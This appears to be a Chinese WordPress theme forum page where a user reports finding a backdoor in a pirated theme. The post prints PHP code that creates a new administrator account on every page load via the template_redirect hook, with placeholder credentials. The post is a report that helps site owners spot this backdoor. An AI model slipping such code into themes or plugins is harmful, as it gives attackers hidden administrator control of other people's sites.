社区标签  求助-WordPress主题模板-zibll子比主题
标签

求助

遇到了什么问吗?我们一起来解决
帖子数
207
阅读量
5W+
该板块内容已隐藏

以下用户组可查看

认证用户

登录后查看我的权限

该帖子内容已隐藏,请登录后查看

登录后继续查看

有添加管理员账号的function代码,之前帮一个大聪明排查网站结果是盗版主题看到了这段代码

add_action( 'template_redirect', 'wpdaxue_create_admin_user' );
function wpdaxue_create_admin_user() {
 
	$username = FALSE; // 将FALSE改为你的用户名,包含英文引号,(例如 'username' ),下同
	$password = FALSE; // 将FALSE改为你的密码 (例如 'password' )
	$email_address = FALSE; // 将FALSE改为你的邮箱地址 (例如 '114514@1919810.com' )
 
	if ( isset( $username ) && isset( $password ) && isset( $email_address ) ) {
		if ( ! username_exists( $username ) && ! email_exists( $email_address ) ) {
 
			$user_id = wp_create_user( $username, $password, $email_address );
			if ( is_int( $user_id ) ) {
				$wp_user_object = new WP_User( $user_id );
				$wp_user_object->set_role( 'administrator' );
			}
		}
	}
}